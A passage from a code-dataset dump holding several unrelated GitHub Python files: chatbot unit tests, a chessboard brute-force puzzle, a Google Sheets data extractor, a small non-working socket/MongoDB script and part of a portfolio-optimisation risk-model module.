-1","repo_name":"ibsa21/A2SV-practise-questions","sub_path":"33-search-in-rotated-sorted-array/33-search-in-rotated-sorted-array.py","file_name":"33-search-in-rotated-sorted-array.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70625512649","text":"import pytest\nfrom context import PyBot, DummyStemmer\n\n\n@pytest.fixture\ndef bot(request):\n bot = PyBot(None)\n\n def cleanup():\n bot = None\n\n request.addfinalizer(cleanup)\n\n return bot\n\n\ndef test_initialize_bot_class(bot):\n # arrange, act\n bot = PyBot(None)\n\n # assert\n assert bot != None\n\n\ndef test_register_action(bot):\n # arrange\n action_name = 'greeting'\n\n def action(name): return \"Hello {}\".format(name)\n\n # act\n bot.register_action(action_name, action)\n actual_action = bot._get_action(action_name)\n\n # assert\n assert actual_action == action\n assert actual_action('World') == 'Hello World'\n\n\ndef test_register_actions(bot: PyBot):\n # arrange\n expected_actions_count = 2\n class_name1 = 'action1'\n\n def action1(): return 'Action 1 Method'\n\n class_name2 = 'action2'\n\n def action2(): return 'Action 2 Method'\n\n # act\n bot.register_actions([\n {'class_name': class_name1, 'method': action1},\n {'class_name': class_name2, 'method': action2}\n ])\n actions_count = len(bot._actions.keys())\n\n # assert\n assert actions_count == expected_actions_count\n assert class_name1 in bot._actions\n assert class_name2 in bot._actions\n\n\ndef test_set_stemmer_on_success_executes_correctly(bot: PyBot):\n\n # arrange\n class DummyStemmer(object):\n def stem(self):\n pass\n\n # act\n bot.set_stemmer(DummyStemmer())\n\n # assert\n assert bot._stemmer != None\n\n\ndef test_set_stemmer_on_exception_should_throw(bot: PyBot):\n # arrange\n\n # act\n with 
pytest.raises(Exception) as ex:\n bot.set_stemmer(None)\n\n # assert\n assert ex != None\n\n\ndef test_set_stemmer_without_stem_method_throws_exception(bot: PyBot):\n # arrange\n class DummyStemmer:\n pass\n\n # act\n with pytest.raises(Exception) as ex:\n bot.set_stemmer(DummyStemmer())\n\n # assert\n assert ex != None\n\n\ndef test_train(bot: PyBot):\n\n # arrange\n greeting_class = 'greeting'\n train_data = [\n {\n 'class': greeting_class,\n 'sentences': [\n 'hi',\n 'hello',\n 'hey',\n 'whats up',\n 'he hello'\n ]\n }\n ]\n bot.set_stemmer(DummyStemmer())\n\n # act\n bot._train(train_data)\n\n # assert\n assert bot._corpus_words != {}\n assert 'hi' in bot._corpus_words\n assert 'hey' in bot._corpus_words\n assert 'hello' in bot._corpus_words\n assert bot.corpus_words['hello'] == 2\n assert bot._class_words != {}\n assert greeting_class in bot._class_words\n assert len(bot._class_words[greeting_class]) > 0\n","repo_name":"fabianobizarro/pybot","sub_path":"tests/test_bot.py","file_name":"test_bot.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21079889292","text":"import sys\nn, m = map(int, input().split())\nres = []\narray = []\nfor i in range(n):\n array.append(list(sys.stdin.readline().rstrip()))\n\nfor i in range(n-7):\n for j in range(m-7):\n w = 0\n b = 0\n for e in range(i, i + 8):\n for q in range(j, j + 8):\n if (e + q) % 2 == 0:\n if array[e][q] != 'W': w += 1\n if array[e][q] != 'B': b += 1\n else:\n if array[e][q] != 'B' : w += 1\n if array[e][q] != 'W' : b += 1\n \n res.append(w)\n res.append(b)\nprint(min(res))","repo_name":"wonjune2/algorithm","sub_path":"backjoon/브루트 포스/1018.py","file_name":"1018.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12539392154","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport logging\nfrom pathlib import Path\nfrom typing import Dict, List, NamedTuple, Optional, Union, Any\n\nfrom google.oauth2 import service_account\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\n\nfrom ..databases.constants import (\n CompositeVariableField,\n InstitutionField,\n SiglaAnswerField,\n VariableField,\n VariableType,\n)\nfrom ..utils.exceptions import ErrorInfo\nfrom . 
import exceptions\nfrom .constants import GoogleSheetsFormat as gs_format\nfrom .constants import GoogleSheetsInfoField, MetaDataField\nfrom .utils import (\n FormattedSheetData,\n SheetData,\n create_institution_sub_category,\n)\n\n###############################################################################\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"[%(levelname)4s: %(module)s:%(lineno)4s %(asctime)s] %(message)s\",\n)\nlog = logging.getLogger(__name__)\n\nGOOGLE_API_SCOPES = [\"https://www.googleapis.com/auth/spreadsheets\"]\n\n###############################################################################\n\n\ndef _get_composite_variable(\n sheet_data: SheetData,\n) -> List[Dict[str, Union[int, List[Dict[str, str]]]]]:\n \"\"\"\n Get the composite variable from a SheetData.\n\n Parameters\n ----------\n sheet_data: SheetData\n The sheet data containing the composite variable.\n\n Returns\n -------\n composite_variable: List[Dict[str, Union[int, List[Dict[str, str]]]]]\n A list of individual variables of a composite varible.\n \"\"\"\n column_names = sheet_data.data[0]\n composite_variable = [\n {\n CompositeVariableField.index: i,\n CompositeVariableField.sigla_answers: [\n {SiglaAnswerField.name: column_name, SiglaAnswerField.answer: row[j]}\n for j, column_name in enumerate(column_names)\n ],\n }\n for i, row in enumerate(sheet_data.data[1:])\n ]\n\n log.info(\n f\"Found composite variable: {sheet_data.meta_data.get('variable_heading')} of length {len(composite_variable)} \"\n f\"from sheet: {sheet_data.sheet_title}\"\n )\n return composite_variable\n\n\ndef _get_multilple_sigla_answer_variable(\n sheet_data: SheetData,\n) -> List[Dict[str, Union[str, List[Dict[str, Union[int, str]]]]]]:\n \"\"\"\n Get the list of institutions and their variables from a sheet.\n\n Parameters\n ----------\n sheet_data: SheetData\n The data of a sheet.\n\n Returns\n -------\n institutions: List[Dict[str, Union[str, List[Dict[str, Union[int, str]]]]]]\n The list of institutions and their variables\n \"\"\"\n try:\n institution = {\n InstitutionField.spreadsheet_id: sheet_data.spreadsheet_id,\n InstitutionField.sheet_id: sheet_data.sheet_id,\n InstitutionField.name: sheet_data.meta_data.get(InstitutionField.name),\n InstitutionField.country: sheet_data.meta_data.get(\n InstitutionField.country\n ),\n InstitutionField.category: sheet_data.meta_data.get(\n InstitutionField.category\n ),\n InstitutionField.sub_category: create_institution_sub_category(\n sheet_data.meta_data.get(InstitutionField.sub_category)\n ),\n \"childs\": [\n {\n VariableField.heading: variable_row[0],\n VariableField.name: variable_row[1],\n VariableField.sigla_answer: variable_row[2],\n VariableField.orig_text: variable_row[3],\n VariableField.source: variable_row[4],\n VariableField.variable_index: i,\n VariableField.type: VariableType.standard,\n }\n for i, variable_row in enumerate(sheet_data.data[1:])\n ],\n }\n log.info(f\"Found 1 institution from {sheet_data.sheet_title}\")\n return [institution]\n except IndexError:\n log.info(\"=*80\")\n log.error(sheet_data.sheet_title)\n\n\ndef _get_standard_institution(\n sheet_data: SheetData,\n) -> List[Dict[str, Union[str, List[Dict[str, Union[int, str]]]]]]:\n \"\"\"\n Get the list of institutions and their variables from a sheet.\n\n Parameters\n ----------\n sheet_data: SheetData\n The data of the sheet.\n\n Returns\n -------\n institutions: List[Dict[str, Union[str, List[Dict[str, Union[int, str]]]]]]\n The list of institutions and their variables.\n \"\"\"\n\n # 
Get the institution names from the first row of data\n institution_names = [\n institution_name for institution_name in sheet_data.data[0] if institution_name\n ]\n institutions = [\n {\n InstitutionField.spreadsheet_id: sheet_data.spreadsheet_id,\n InstitutionField.sheet_id: sheet_data.sheet_id,\n InstitutionField.name: institution_name,\n InstitutionField.category: sheet_data.meta_data.get(\n InstitutionField.category\n ),\n InstitutionField.sub_category: create_institution_sub_category(\n sheet_data.meta_data.get(InstitutionField.sub_category)\n ),\n \"childs\": [\n {\n VariableField.heading: variable_row[0],\n VariableField.name: variable_row[1],\n VariableField.sigla_answer: variable_row[2 + i * 3],\n VariableField.orig_text: variable_row[2 + i * 3 + 1],\n VariableField.source: variable_row[2 + i * 3 + 2],\n VariableField.variable_index: j,\n VariableField.type: VariableType.standard,\n }\n # The variables starts in the 3rd row of data\n for j, variable_row in enumerate(sheet_data.data[2:])\n ],\n }\n for i, institution_name in enumerate(institution_names)\n ]\n\n has_country = InstitutionField.country in sheet_data.meta_data\n for institution in institutions:\n if has_country:\n institution[InstitutionField.country] = sheet_data.meta_data.get(\n InstitutionField.country\n )\n\n log.info(\n f\"Found {len(institutions)} institutions from sheet {sheet_data.sheet_title}\"\n )\n return institutions\n\n\nclass A1Notation(NamedTuple):\n \"\"\"\n A1 notation refers to a group of cells within a bounding rectangle in a sheet.\n This doesn't capture all possible A1 notations because start_row and end_row are required,\n but they don't have to be.\n\n Attributes:\n sheet_id: str\n The id of the sheet that contains a group cells\n sheet_title: str\n The title of the sheet that contains a group of cells.\n start_row: int\n The top row boundary of a group of cells.\n end_row: int\n The bottom row boundary of a group of cells.\n start_column: Optional[str] = None\n The left column boundary of a group of cells.\n end_column: Optional[str] = None\n The right column boundary of a group of cells\n \"\"\"\n\n sheet_id: str\n sheet_title: str\n start_row: int\n end_row: int\n start_column: Optional[str] = None\n end_column: Optional[str] = None\n\n def raise_for_validity(self) -> None:\n \"\"\"\n Raise an error if the a1 notation is invalid.\n https://developers.google.com/sheets/api/guides/concepts#a1_notation\n\n For a description of an A1 notation, please view the A1Notation class attributes.\n \"\"\"\n\n if int(self.start_row) > int(self.end_row):\n # Start row is greater than end row\n raise exceptions.InvalidRangeInA1Notation(\n ErrorInfo(\n {\n GoogleSheetsInfoField.sheet_id: self.sheet_id,\n GoogleSheetsInfoField.sheet_title: self.sheet_title,\n MetaDataField.start_row: self.start_row,\n MetaDataField.end_row: self.end_row,\n }\n )\n )\n elif self.start_column is not None and self.end_column is not None:\n # Start and end column are both present\n if len(self.start_column) > len(self.end_column):\n # Length of start column is greater than length end column\n raise exceptions.InvalidRangeInA1Notation(\n ErrorInfo(\n {\n GoogleSheetsInfoField.sheet_id: self.sheet_id,\n GoogleSheetsInfoField.sheet_title: self.sheet_title,\n MetaDataField.start_column: self.start_column,\n MetaDataField.end_column: self.end_column,\n }\n )\n )\n elif len(self.start_column) == len(self.end_column):\n if self.start_column > self.end_column:\n # Start column is greater than end column\n raise 
exceptions.InvalidRangeInA1Notation(\n ErrorInfo(\n {\n GoogleSheetsInfoField.sheet_id: self.sheet_id,\n GoogleSheetsInfoField.sheet_title: self.sheet_title,\n MetaDataField.start_column: self.start_column,\n MetaDataField.end_column: self.end_column,\n }\n )\n )\n elif any(field is not None for field in [self.start_column, self.end_column]):\n # Either start column or end column is present\n raise exceptions.IncompleteColumnRangeInA1Notation(\n ErrorInfo(\n {\n GoogleSheetsInfoField.sheet_id: self.sheet_id,\n GoogleSheetsInfoField.sheet_title: self.sheet_title,\n MetaDataField.start_column: self.start_column,\n MetaDataField.end_column: self.end_column,\n }\n )\n )\n\n def __str__(self) -> str:\n \"\"\"\n Returns str representation of the a1 notation.\n \"\"\"\n if self.start_column is not None and self.end_column is not None:\n return f\"'{self.sheet_title}'!{self.start_column}{self.start_row}:{self.end_column}{self.end_row}\"\n else:\n return f\"'{self.sheet_title}'!{self.start_row}:{self.end_row}\"\n\n\nclass GoogleSheetsInstitutionExtracter:\n google_sheets_format_to_function_dict = {\n gs_format.standard_institution: _get_standard_institution,\n gs_format.institution_and_composite_variable: _get_composite_variable,\n gs_format.composite_variable: _get_composite_variable,\n gs_format.multiple_sigla_answer_variable: _get_multilple_sigla_answer_variable,\n }\n\n def __init__(self, credentials_path: str):\n credentials_path = Path(credentials_path).resolve(strict=True)\n self._credentials_path = str(credentials_path)\n # Creates a Credentials instance from a service account json file.\n credentials = service_account.Credentials.from_service_account_file(\n self._credentials_path, scopes=GOOGLE_API_SCOPES\n )\n # Construct a Resource for interacting with Google Sheets API\n # `num_retries` downstreams\n # See https://github.com/googleapis/google-api-python-client/issues/1049#issuecomment-702893972\n service = build(\n \"sheets\",\n \"v4\",\n credentials=credentials,\n cache_discovery=False,\n num_retries=3,\n )\n # Store the spreadsheets service\n self.spreadsheets = service.spreadsheets()\n\n def _get_spreadsheet(self, spreadsheet_id: str) -> Any:\n \"\"\"\n Get the spreadsheet from a spreadsheet_id\n\n Parameters\n ----------\n spreadsheet_id: str\n The id of the spreadsheet\n\n Returns\n -------\n spreadsheet: The spreadsheet.\n See https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#Spreadsheet.\n\n \"\"\"\n # Get the spreadsheet\n return self.spreadsheets.get(spreadsheetId=spreadsheet_id).execute()\n\n def _get_spreadsheet_tile(self, spreadsheet: Any) -> str:\n \"\"\"Get the title of a spreadsheet\"\"\"\n return spreadsheet.get(\"properties\").get(\"title\")\n\n def _get_meta_data_a1_notations(\n self,\n spreadsheet: Any,\n ) -> List[A1Notation]:\n \"\"\"\n Construct an A1Notation for each sheet from its first two rows of meta data\n\n Parameters\n ----------\n spreadsheet: str\n The spreadsheet object.\n See https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#Spreadsheet\n\n Returns\n -------\n a1_notations: List[A1Notatoin]\n The list of A1Notations, one for each sheet.\n \"\"\"\n # Create an A1Notation for each sheet's meta data\n return [\n A1Notation(\n sheet_id=sheet.get(\"properties\").get(\"sheetId\"),\n sheet_title=sheet.get(\"properties\").get(\"title\"),\n start_row=1,\n end_row=2,\n )\n for sheet in spreadsheet.get(\"sheets\")\n ]\n\n def _get_meta_data(\n self, spreadsheet_id: str, a1_notations: List[A1Notation]\n ) -> 
List[Dict[str, str]]:\n \"Get the rows specified by the a1 notations\"\n # Get the meta data for each sheet\n meta_data_response = (\n self.spreadsheets.values()\n .batchGet(\n spreadsheetId=spreadsheet_id,\n ranges=[str(a1_notation) for a1_notation in a1_notations],\n majorDimension=\"COLUMNS\",\n )\n .execute()\n )\n # Get data within a range (specified by an a1 notation) for each sheet\n meta_data_value_ranges = meta_data_response.get(\"valueRanges\")\n # print(meta_data_value_ranges)\n # Create the meta datum for each sheet\n meta_data = [\n {value[0].strip(): value[1].strip() for value in value_range.get(\"values\")}\n for value_range in meta_data_value_ranges\n ]\n\n return meta_data\n\n def _get_data_a1_notations(\n self, a1_notations: List[A1Notation], meta_data: List[Dict[str, str]]\n ) -> List[A1Notation]:\n # Use the meta datum to create an a1 notation to get the datum of each sheet\n bounding_box_a1_notations = [\n A1Notation(\n sheet_id=a1_notations[i].sheet_id,\n sheet_title=a1_notations[i].sheet_title,\n start_row=int(meta_datum.get(MetaDataField.start_row)),\n end_row=int(meta_datum.get(MetaDataField.end_row)),\n start_column=meta_datum.get(MetaDataField.start_column),\n end_column=meta_datum.get(MetaDataField.end_column),\n )\n for i, meta_datum in enumerate(meta_data)\n ]\n\n for a1_anotation in bounding_box_a1_notations:\n a1_anotation.raise_for_validity()\n\n return bounding_box_a1_notations\n\n def _get_data(\n self, spreadsheet_id: str, a1_notations: List[A1Notation]\n ) -> List[List[List[Any]]]:\n data_response = (\n self.spreadsheets.values()\n .batchGet(\n spreadsheetId=spreadsheet_id,\n ranges=[str(a1_notation) for a1_notation in a1_notations],\n majorDimension=\"ROWS\",\n )\n .execute()\n )\n data = [\n value_range.get(\"values\")\n for value_range in data_response.get(\"valueRanges\")\n ]\n\n return data\n\n def _get_next_uv_dates_a1_annotations(\n self, a1_notations: List[A1Notation], meta_data: List[Dict[str, str]]\n ) -> List[A1Notation]:\n # Create a1 notations to get next uv dates\n next_uv_date_a1_notations = [\n A1Notation(\n sheet_id=a1_notations[i].sheet_id,\n sheet_title=a1_notations[i].sheet_title,\n start_row=int(meta_datum.get(MetaDataField.start_row)),\n end_row=int(meta_datum.get(MetaDataField.end_row)),\n start_column=meta_datum.get(MetaDataField.date_of_next_uv_column),\n end_column=meta_datum.get(MetaDataField.date_of_next_uv_column),\n )\n for i, meta_datum in enumerate(meta_data)\n if meta_datum.get(MetaDataField.date_of_next_uv_column) is not None\n ]\n for a1_notation in next_uv_date_a1_notations:\n a1_notation.raise_for_validity()\n return next_uv_date_a1_notations\n\n def _get_next_uv_dates_data(\n self, spreadsheet_id: str, a1_notations: List[A1Notation]\n ) -> List[List[Any]]:\n if not a1_notations:\n return []\n\n next_uv_date_response = (\n self.spreadsheets.values()\n .batchGet(\n spreadsheetId=spreadsheet_id,\n ranges=[str(a1_notation) for a1_notation in a1_notations],\n majorDimension=\"COLUMNS\",\n )\n .execute()\n )\n next_uv_date_data = [\n value_range.get(\"values\")[0]\n for value_range in next_uv_date_response.get(\"valueRanges\") or []\n ]\n return next_uv_date_data\n\n def get_spreadsheet_data(self, spreadsheet_id: str) -> List[SheetData]:\n \"\"\"\n Get the spreadsheet data given a spreadsheet id.\n\n Parameters\n ----------\n spreadsheet_id: str\n The id of the spreadsheet.\n\n Returns\n -------\n spreadsheet_data: List[SheetData]\n The spreadsheet data. 
Please the SheetData class to view its attributes.\n \"\"\"\n try:\n spreadsheet = self._get_spreadsheet(spreadsheet_id=spreadsheet_id)\n # Get an A1Notation for each sheet's meta data\n meta_data_a1_notations = self._get_meta_data_a1_notations(\n spreadsheet=spreadsheet\n )\n # Get the spreadsheet title\n spreadsheet_title = self._get_spreadsheet_tile(spreadsheet=spreadsheet)\n # Get the meta data for each sheet\n meta_data = self._get_meta_data(\n spreadsheet_id=spreadsheet_id,\n a1_notations=meta_data_a1_notations,\n )\n # Use the meta datum to create an a1 notation to get the datum of each sheet\n bounding_box_a1_notations = self._get_data_a1_notations(\n a1_notations=meta_data_a1_notations,\n meta_data=meta_data,\n )\n # Get data within a range (specified by an a1 notation) for each sheet\n data = self._get_data(\n spreadsheet_id=spreadsheet_id,\n a1_notations=bounding_box_a1_notations,\n )\n\n # Create a1 notations to get next uv dates\n next_uv_date_a1_notations = self._get_next_uv_dates_a1_annotations(\n a1_notations=meta_data_a1_notations,\n meta_data=meta_data,\n )\n # Get the next uv dates\n next_uv_date_data = self._get_next_uv_dates_data(\n spreadsheet_id=spreadsheet_id, a1_notations=next_uv_date_a1_notations\n )\n except HttpError as http_error:\n raise exceptions.UnableToAccessSpreadsheet(\n ErrorInfo(\n {\n GoogleSheetsInfoField.spreadsheet_title: spreadsheet_title,\n \"reason\": f\"{http_error}\",\n }\n )\n )\n\n next_uv_date_data_iter = iter(next_uv_date_data)\n\n log.info(f\"Finished extracting spreadsheet {spreadsheet_title}\")\n log.info(f\"Found {len(meta_data)} sheets in spreadsheet {spreadsheet_title}\")\n return [\n SheetData(\n spreadsheet_id=spreadsheet_id,\n spreadsheet_title=spreadsheet_title,\n sheet_id=a1_notation.sheet_id,\n sheet_title=a1_notation.sheet_title,\n meta_data=meta_data[i],\n data=data[i],\n next_uv_dates=(\n next(next_uv_date_data_iter)\n if meta_data[i].get(MetaDataField.date_of_next_uv_column)\n is not None\n else None\n ),\n )\n for i, a1_notation in enumerate(meta_data_a1_notations)\n ]\n\n def get_spreadsheet_ids(self, master_spreadsheet_id: str) -> List[str]:\n \"\"\"\n Get the list of spreadsheet ids from a master spreadsheet.\n\n Parameters\n ----------\n master_spreadsheet_id: str\n The id of the master spreadsheet.\n\n Returns\n -------\n spreadsheet_ids: List[str]\n The list of spreadsheet ids.\n \"\"\"\n spreadsheet_data = self.get_spreadsheet_data(master_spreadsheet_id)\n\n # There is only sheet in the master spreadsheet.\n # All spreadsheet ids are in the first column.\n spreadsheet_ids = [row[0] for row in spreadsheet_data[0].data]\n # spreadsheet_ids = [row[0] for row in spreadsheet_data.data[0]]\n log.info(\n f\"Found {len(spreadsheet_ids)} spreadsheets from master spreadsheet {master_spreadsheet_id}\"\n )\n return spreadsheet_ids\n\n @staticmethod\n def process_sheet_data(sheet_data: SheetData) -> FormattedSheetData:\n \"\"\"\n Process a sheet to get its data in a format ready to consumed by DB.\n\n Parameters\n ----------\n sheet_data: SheetData\n The data of the sheet.\n\n Returns\n -------\n formatted_sheet_data: FormattedSheetData\n The data in reqired format.\n \"\"\"\n formatted_data = None\n get_data_key = sheet_data.meta_data.get(MetaDataField.format)\n\n if (\n get_data_key\n in GoogleSheetsInstitutionExtracter.google_sheets_format_to_function_dict\n ):\n get_data_function = (\n GoogleSheetsInstitutionExtracter.google_sheets_format_to_function_dict[\n get_data_key\n ]\n )\n try:\n formatted_data = 
get_data_function(sheet_data)\n except Exception:\n raise exceptions.UnableToCreateFormattedSheetData(\n ErrorInfo(\n {\n GoogleSheetsInfoField.spreadsheet_title: sheet_data.spreadsheet_title,\n GoogleSheetsInfoField.sheet_title: sheet_data.sheet_title,\n }\n )\n )\n else:\n raise exceptions.UnrecognizedGoogleSheetsFormat(\n ErrorInfo(\n {\n GoogleSheetsInfoField.spreadsheet_title: sheet_data.spreadsheet_title,\n GoogleSheetsInfoField.sheet_title: sheet_data.sheet_title,\n MetaDataField.format: sheet_data.meta_data.get(\n MetaDataField.format\n ),\n MetaDataField.data_type: sheet_data.meta_data.get(\n MetaDataField.data_type\n ),\n }\n )\n )\n\n return FormattedSheetData(\n spreadsheet_id=sheet_data.spreadsheet_id,\n spreadsheet_title=sheet_data.spreadsheet_title,\n sheet_id=sheet_data.sheet_id,\n sheet_title=sheet_data.sheet_title,\n meta_data=sheet_data.meta_data,\n formatted_data=formatted_data,\n )\n\n def __str__(self):\n return f\"<GoogleSheetsInstitutionExtracter [{self._credentials_path}]>\"\n\n def __repr__(self):\n return str(self)\n","repo_name":"SIGLA-GU/siglatools","sub_path":"siglatools/institution_extracters/google_sheets_institution_extracter.py","file_name":"google_sheets_institution_extracter.py","file_ext":"py","file_size_in_byte":23999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28250837394","text":"import socket\nimport json\nfrom pymongo import MongoClient\nfrom flask import *\n\n\n\nclient = MongoClient('Localhost', 27017)\nregister = client.a_verifier\n\n# le code ne fonctionne pas \n\n\ndef conect():\n # Créer un socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Adresse IP et port sur lesquels écouter\n host = '192.168...'\n port = 80\n # Lier le socket à l'adresse IP et au port\n sock.bind((host, port))\n # Écouter les connexions entrantes\n sock.listen(1)\n while True:\n # Accepter une connexion entrante\n conn, addr = sock.accept()\n # Recevoir les données via le socket\n data = conn.recv(1024).decode()\n # Convertir la chaîne JSON en variable Python\n my_variable = json.loads(data)\n my_variable = str(my_variable)\n table = register.users.find_one({\"numid\": my_variable})\n print(table['nom'])\n return render_template(\"account.html\",userName = table['nom'])\n\n\n connect_user2(my_variable)\n # Fermer la connexion\n conn.close()\n # Fermer le socket\n sock.close()\n\nconect()","repo_name":"Krost1/End-of-bachelor-degree-project","sub_path":"Ultimated-Card-main/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10528587465","text":"from .estimator import DataEstimator \nimport logging\nimport warnings\n\nimport scipy.linalg\n\nimport cvxpy as cp\nimport numpy as np\nimport pandas as pd\n\nfrom .costs import BaseCost\nfrom .forecast import HistoricalVariance, HistoricalFactorizedCovariance\n\nlogger = logging.getLogger(__name__)\n\n\n__all__ = [\n \"FullCovariance\",\n \"DiagonalCovariance\",\n \"FactorModelCovariance\",\n \"RiskForecastError\",\n \"WorstCaseRisk\",\n]\n\n\n\n\nclass BaseRiskModel(BaseCost):\n pass\n\n\n\n\nclass FullCovariance(BaseRiskModel):\n \"\"\"Quadratic risk model with full covariance matrix.\n \n :param Sigma: DataFrame of covariance matrices\n supplied by the user, or None if fitting from the past data.\n The DataFrame can either represents a single constant covariance matrix\n or one for each point in time.\n 
:type Sigma: pandas.DataFrame or None\n \n \n \"\"\"\n # r\"\"\"Quadratic risk model with full covariance matrix.\n #\n # This class represents the term :math:`\\Sigma_t`, *i.e.,*\n # the :math:`(n-1) \\times (n-1)` positive semi-definite matrix\n # which estimates the covariance of the (non-cash) assets' returns.\n # :ref:`Optimization-based policies` use this, as is explained\n # in Chapter 4 and 5 of the `book <https://web.stanford.edu/~boyd/papers/pdf/cvx_portfolio.pdf>`_.\n #\n # The user can either supply a :class:`pandas.DataFrame` with the covariance matrix\n # (constant or varying in time) computed externally (for example\n # with some machine learning technique) or let this class estimate the covariance from the data.\n # The latter is the default behavior.\n #\n # This class implements three ways to compute the covariance matrix from the past returns. The\n # computation is repeated at each point in time :math:`t` of a :class:`BackTest` using only\n # the past returns available at that point: :math:`r_{t-1}, r_{t-2}, \\ldots`.\n #\n # * *rolling covariance*, using :class:`pandas.DataFrame.rolling.cov`. This is done\n # if the user specifies the ``rolling`` argument.\n # * *exponential moving window covariance*, using :class:`pandas.DataFrame.ewm.cov`. This is done\n # if the user specifies the ``halflife`` argument (``rolling`` takes precedence).\n # * *full historical covariance*, using :class:`pandas.DataFrame.cov`. This is the default\n # behavior if no arguments are specified.\n #\n # If there are missing data in the historical returns the estimated covariance may not\n # be positive semi-definite. We correct it by projecting on the positive semi-definite\n # cone (*i.e.*, we set the negative eigenvalues of the resulting :math:`\\Sigma_t` to zero).\n #\n # :param Sigma: :class:`pandas.DataFrame` of covariance matrices\n # supplied by the user. The DataFrame either represents a single (constant) covariance matrix\n # or one for each point in time. In the latter case the DataFrame must have a :class:`pandas.MultiIndex`\n # where the first level is a :class:`pandas.DatetimeIndex`. If ``None`` (the default)\n # the covariance matrix is computed from past returns.\n # :type Sigma: pandas.DataFrame or None\n # :param rolling: if it is not ``None`` the covariance matrix will be estimated\n # on a rolling window of size ``rolling`` of the past returns.\n # :type rolling: int or None\n # :param halflife: if it is not ``None`` the covariance matrix will be estimated\n # on an exponential moving window of the past returns with half-life ``halflife``.\n # If ``rolling`` is specified it takes precedence over ``halflife``. If both are ``None`` the full history\n # will be used for estimation.\n # :type halflife: int or None\n # :param kappa: the multiplier for the associated forecast error risk\n # (see pages 32-33 of the `book <https://web.stanford.edu/~boyd/papers/pdf/cvx_portfolio.pdf>`_).\n # If ``float`` a passed it is treated as a constant, if ``pandas.Series`` with ``pandas.DateTime`` index\n # it varies in time, if ``None`` the forecast error risk term will not be compiled.\n # :type kappa: float or pandas.Series or None\n # :param kelly: correct the covariance matrix with the term :math:`\\mu\\mu^T`, as is explained\n # in page 28 of the `book <https://web.stanford.edu/~boyd/papers/pdf/cvx_portfolio.pdf>`_,\n # to match the second term of the Taylor expansion of the portfolio log-return. Default\n # is ``False``, corresponding to classical mean-variance optimization. 
If ``True``, it\n # estimates :math:`\\mu` with the same technique as :math:`\\Sigma`, *i.e.*, with rolling window\n # average, exponential moving window average, or an average of the full history.\n # :type kelly: bool\n # \"\"\"\n\n def __init__(self, Sigma=None, kelly=True):\n\n if not Sigma is None:\n self.Sigma = DataEstimator(Sigma)\n self.alreadyfactorized = False\n else:\n self.Sigma = HistoricalFactorizedCovariance(kelly=kelly) \n self.alreadyfactorized = True\n \n def pre_evaluation(self, universe, backtest_times):\n super().pre_evaluation(universe, backtest_times)\n \n self.Sigma_sqrt = cp.Parameter((len(universe)-1, len(universe)-1))\n\n def values_in_time(self, t, past_returns, **kwargs):\n \"\"\"Update forecast error risk here, and take square root of Sigma.\"\"\"\n super().values_in_time(t=t, past_returns=past_returns, **kwargs)\n \n if self.alreadyfactorized:\n self.Sigma_sqrt.value = self.Sigma.current_value\n else:\n Sigma = self.Sigma.current_value\n eigval, eigvec = np.linalg.eigh(Sigma)\n eigval = np.maximum(eigval, 0.)\n self.Sigma_sqrt.value = eigvec @ np.diag(np.sqrt(eigval))\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n self.cvxpy_expression = cp.sum_squares(self.Sigma_sqrt.T @ w_plus_minus_w_bm[:-1])\n return self.cvxpy_expression\n\nclass RiskForecastError(BaseRiskModel):\n \"\"\"Risk forecast error. \n \n Implements the model defined in page 31 of the book. Takes same arguments\n as :class:`DiagonalCovariance`.\n \n :param sigma_squares: per-stock variances, indexed by time if DataFrame.\n If None it will be fitted on past data.\n :type sigma_squares: pd.DataFrame or pd.Series or None\n \"\"\"\n\n def __init__(self, sigma_squares=None):\n if sigma_squares is None:\n self.sigma_squares = HistoricalVariance(kelly=True) #None None\n else:\n self.sigma_squares = DataEstimator(sigma_squares)\n # self.standard_deviations = ParameterEstimator(standard_deviations)\n # self.zeroforcash=True\n # self.kelly=True\n \n def pre_evaluation(self, universe, backtest_times):\n super().pre_evaluation(universe, backtest_times)\n self.sigmas_parameter = cp.Parameter(len(universe)-1, nonneg=True)#+self.kelly))\n\n def values_in_time(self, t, past_returns, **kwargs):\n \"\"\"Update forecast error risk here, and take square root of Sigma.\"\"\"\n super().values_in_time(t=t, past_returns=past_returns)\n \n # if self.sigma_squares is None:\n # sigma_squares = past_returns.var(ddof=0)\n # if self.kelly:\n # mean = past_returns.mean()\n # sigma_squares += mean**2\n # if self.zeroforcash:\n # sigma_squares.iloc[-1] = 0.\n # sigma_squares = sigma_squares.values\n # else:\n # sigma_squares = self.sigma_squares.current_value\n \n sigma_squares = self.sigma_squares.current_value\n \n self.sigmas_parameter.value = np.sqrt(sigma_squares)\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n\n return cp.square(cp.abs(w_plus_minus_w_bm[:-1]).T @ self.sigmas_parameter)\n \n\nclass DiagonalCovariance(BaseRiskModel):\n \"\"\"Diagonal covariance matrix, user-provided or fit from data.\n\n :param sigma_squares: per-stock variances, indexed by time if DataFrame.\n If None it will be fitted on past data.\n :type sigma_squares: pd.DataFrame or pd.Series or None \n \"\"\"\n\n def __init__(self, sigma_squares=None):\n if not sigma_squares is None:\n self.sigma_squares = DataEstimator(sigma_squares)\n else:\n self.sigma_squares = HistoricalVariance(kelly=True) #None\n #self.zeroforcash = True\n #self.kelly = True\n # self.standard_deviations = 
